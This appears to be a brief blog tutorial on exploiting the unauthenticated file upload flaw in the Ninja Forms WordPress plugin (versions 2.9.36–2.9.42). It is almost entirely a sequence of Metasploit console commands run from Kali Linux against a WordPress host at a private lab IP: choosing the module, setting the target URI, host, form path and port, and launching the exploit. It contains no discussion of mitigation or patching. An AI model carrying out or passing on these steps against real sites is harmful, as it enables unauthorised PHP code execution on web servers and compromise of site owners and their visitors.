Exploiting WordPress using Ninja Forms Unauthenticated File Upload

Versions 2.9.36 to 2.9.42 of the Ninja Forms plugin contain an unauthenticated file upload vulnerability, allowing guests to upload arbitrary PHP code that can be executed in the context of the web server.

 Exploit Targets

ninja forms 2.9.36

Requirement

Attacker: kali Linux

Victim PC: wordpress

Open Kali terminal type msfconsole

Now type use exploit/unix/webapp/wp_ninja_forms_unauthenticated_file_upload

msf exploit (wp_ninja_forms_unauthenticated_file_upload)>set targeturi /wordpress/

msf exploit (wp_ninja_forms_unauthenticated_file_upload)>set rhost 192.168.0.106 (IP of Remote Host)

msf exploit (wp_ninja_forms_unauthenticated_file_upload)>set form_path /test/

msf exploit (wp_ninja_forms_unauthenticated_file_upload)>set rport 80

msf exploit (wp_ninja_forms_unauthenticated_file_upload)>exploit        

Leave a Reply

Your email address will not be published. Required fields are marked *